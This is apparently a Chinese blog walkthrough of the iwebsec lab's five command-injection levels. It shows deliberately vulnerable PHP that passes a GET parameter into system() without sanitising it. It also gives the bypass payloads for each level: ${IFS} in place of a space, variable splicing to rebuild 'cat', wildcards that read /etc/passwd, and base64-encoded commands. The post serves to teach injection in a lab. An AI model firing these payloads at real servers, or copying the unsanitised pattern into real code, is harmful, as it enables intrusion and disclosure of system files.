iwebsec靶场命令执行漏洞(全部)

最新推荐文章于 2024-12-31 23:11:35 发布
最新推荐文章于 2024-12-31 23:11:35 发布
阅读量847 收藏 2
点赞数 4
CC 4.0 BY-SA版权
文章标签: 安全 web安全 php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56041380/article/details/130045897
本文介绍了命令执行漏洞的概念,通过PHP代码示例展示了如何通过可控参数执行系统命令,以及四种常见的绕过过滤机制的方法:空格绕过、关键命令绕过、通配符绕过和Base64编码绕过。同时强调了这些漏洞的高危性以及防护的重要性。

 命令执行漏洞

        应用程序的某些功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,这就是命令执行漏洞。它属于高危漏洞之一。

01-命令执行漏洞

源码分析

<?php
	if(isset($_GET['ip'])){

    $ip = $_GET['ip'];

    system("ping -c 2 ".$ip);
	}else{
		exit();
	}
	
?>

先ping两次,因为$ip是一个可控参数,可以通过Linux下的命令连接符执行多条命令,达到攻击的目的

这里以用id来直接获取用户uid gid gruops

?ip=127.0.0.1;id

 

02-命令执行漏洞空格绕过

源码分析

<?php
	if(isset($_GET['ip'])){

		if (preg_match('/ /', $_GET['ip'])) {
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];
			
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}
	
?>

这里用preg_match()对ip中的空格进行过滤

我们以cat 02.php为例

很明显这里显示了error!!!报错信息说明无法直接对其进行执行,需要进行绕过

${IFS}是shell的特殊环境变量,是Linux下的内部域分隔符。$IFS中存储的值可以是空格、制表符、换行符、或者其他自定义符号。

?ip=127.0.0.1;cat${IFS}02.php

 

 这里就不仅仅显示了ping的结果还显示了和该页面一样的结果因为02.php就是该页面

03-命令执行漏洞关键命令绕过

源码分析

<?php
	if(isset($_GET['ip'])){

		if (preg_match('/cat/', $_GET['ip'])) {
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];
			
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}
	
?>

这里是对cat这个命令进行了绕过,我们用变量拼接进行绕过(还可以使用空变量绕过,\绕过,系统变量绕过和通配符绕过)

?ip=127.0.0.1;a=c;b=at; $a$b 03.php

 

04-命令执行漏洞通配符绕过

源码分析

<?php
	if(isset($_GET['ip'])){

		if (preg_match('/etc|passwd/', $_GET['ip'])) {
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];
			
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}
	
?>

这里过滤了/etc|passwd/这个命令,我们要查看这个文件可以用?进行绕过(*可以绕过,是代表0到多个字符;[]内为范围,代表该字符中的任意一个字符)

?ip=127.0.0.1;cat /???/????wd?

 

这样就成功查看到了passwd文件的内容

05-命令值向漏洞Base64编码绕过

源码分析

<?php
	if(isset($_GET['ip'])){

		if (preg_match('/id/', $_GET['ip'])) {
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];
			
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}
	
?>

这个是对id进行了过滤,我们现在就要执行id这个命令,那我们就可以用Base64编码一下编码的结果是aWQ=再利用linux自带的base64 -d进行解码,这样就绕过了正常的命令。

?ip=127.0.0.1;`echo "aWQ=" |base64 -d`

 到这里就全部结束了。

命令执行漏洞—简单利用1(墨者靶场
weixin_44431280的博客
03-03 1937
命令执行漏洞—简单利用1(墨者靶场命令执行漏洞原理和简介可参考文章:Web安全—远程命令/代码执行(RCE) 命令执行漏洞靶场通关: 步骤一:靶场登陆,输入IP地址查看回显。查看Web界面存在输入IP地址的地方,尝试输入环回地址127.0.0.1查看回显 输入IP地址127.0.0.1查看回显: 步骤二:信息收集判断操作系统,尝试使用系统连接符执行连带命令,例如127.0.0.1;ls。 1,使用Google插件Waapalyzer判断操作系统为Ubuntu(linux),可以使用连接符";"和“管
iwebsec靶场 XSS漏洞通关笔记
web15185420056的博客
12-12 1126
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。
漏洞靶场——DVWA+命令执行漏洞
woo233的博客
08-07 3417
DVWA是OWASP官方编写的PHP网站,包含了各种网站常见漏洞
linux环境下的DVWA靶场命令执行漏洞(中级)通关
ma1145141919810的博客
12-31 997
我自己在通关linux环境下的DVWA靶场命令执行漏洞的过程中遇到了很多问题,于是写了这篇文章分享一下自己的思路。
iwebsec靶场-命令执行漏洞
dahege666的博客
03-31 1187
命令执行漏洞
iwebsec--命令执行漏洞
追求卓越,技术流~
12-04 1123
WINDOWS系统支持的管道符 “|”:直接执行后面的语句 例如:ping www.baidu.com|whoami “||”:如果前面执行的语句执行出错,则执行后面的语句 例如:png www.baidu.com||whoami “&”:如果前面的语句为假则直接执行后面的语句,前面的语句可真可假 例如:png www.baidu.com&whoami或者ping www.baidu.com&whoami “&&”:如果前面的语句为真先执行第一个命令后执行第二个命令;为假则直接出错,也不执行后面的语句 例如
iwebsec靶场文件包含漏洞
最新发布
10-23
嗯,用户这次在询问iwebsec靶场中文件包含漏洞的具体信息,包括原理、利用方法和解决方案。用户已经提供了两条引用信息,但主要涉及的是文件上传漏洞和JBoss漏洞,与当前问题关联不大。需要专注在文件包含漏洞本身。...
iwebsec靶场SQL注入漏洞-字符型注入
02-24
在探讨iwebsec靶场中的字符型SQL注入漏洞时,需理解其核心在于利用特定字符串构造来绕过输入验证机制并执行恶意查询。当应用程序未能正确处理特殊字符或未对用户输入做充分过滤时,攻击者可以通过提交精心设计的数据...
iwebsec靶场搭建
07-28
iwebsec靶场是一个漏洞集成容器,其中集成了大量的web漏洞环境,包括SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的漏洞环境。\[1\] 要搭建iwebsec靶场,可以使用docker来运行容器。...
第38天:WEB漏洞-反序列化之PHP&JAVA全解()1
08-03
描述中提到了Java反序列化和命令执行的测试,通过WebGoat_Javaweb靶场进行了实战演练。此外,还提到了一个2020年网鼎杯竞赛的复现案例,其中涉及到Java Web应用的SQL注入和反序列化漏洞。 首先,我们要理解序列化和...
命令执行漏洞 | iwebsec
weixin_52116519的博客
02-26 3311
应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常的命令中,从而造成命令执行攻击,这就是命令执行漏洞。【摘自《web安全攻防》】管道符作用举例直接执行后面的命令。||前面执行的命令执行出错才执行后面的语句。前面的语句无论真假都可以执行后面的语句。(无条件执行后面的语句,推荐使用。&&
iwebsec靶场 命令执行漏洞通关笔记
mooyuan的网络安全博客
11-25 4633
iwebsec靶场命令执行通关笔记,共有五个关卡,分别涉及到基础的命令执行漏洞、空格绕过、关键字绕过、通配符绕过、base64绕过共五方面的渗透。什么是命令执行漏洞命令执行漏洞是服务器端没有对客户端用户输入的参数进行过滤,导致用户可以通过任意拼接系统命令,使服务器端成功执行任意系统命令。命令执行漏洞主要是服务端没有对执行命令的函数做出过滤导致的,因为在web服务程序有时候去需要调用执行命令的函数,所以如果没有对客户端用户输入的命令进行过滤,可能发生命令执行漏洞
iwebsec 靶场 —— 命令执行漏洞
技术笔记
11-05 638
命令执行漏洞
命令执行漏洞--ibos靶场靶场环境是掌控安全的)
xiesiyuan1的博客
02-27 1706
命令执行:用户传入的参数,会被当成系统指令来执行,指令内容用户可控,属于代码执行的一种ctrl+u:在view-source模式自动换行。
iwebsec靶场 解析漏洞通关笔记1-Apache解析漏洞(多后缀解析漏洞
mooyuan的网络安全博客
04-28 2433
本关卡实现iwebsec靶场的Apache 多后缀解析漏洞解析漏洞。。Apache服务器在解析一个文件时,当文件有多个以点分隔的后缀时,如果右边的后缀无法识别(不在mime.types内),则继续从右向左识别,那么我们请求这样一个文件:ljn.php.aaa,遇到第一个扩展名 aaa ->发现无法识别,于是从右向左 识别第二个扩展名php -> 发现后缀是php可以识别,于是交给php 处理。
iwebsec靶场文件包含漏洞-php://input伪协议及利用
qq_56041380的博客
04-05 988
php://input可以访问请求的原始数据的只读流,即可以直接读取POST上没有经过解析的原始数据,但是使用enctype="multipart/form-data"的时候php://input是无效的。
iwebsec靶场文件包含漏洞-session本地包含
qq_56041380的博客
04-02 663
当获取Session文件的路径并且Session的内容可控时,就可以通过包含Session文件进行攻击
iwebsec靶场 文件包含漏洞通关笔记1-本地文件包含漏洞
mooyuan的网络安全博客
04-20 2313
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。比如 在PHP中,提供了:这些文件包含函数,这些函数在代码设计中被经常使用到。
iwebse靶场文件包含漏洞-本地文件包含
qq_56041380的博客
04-01 386
文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,文论文件是什么类型,文件内的恶意代码都会被解析并执行。 文件包含漏洞可能会造成服务器的网页被恶意篡改
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值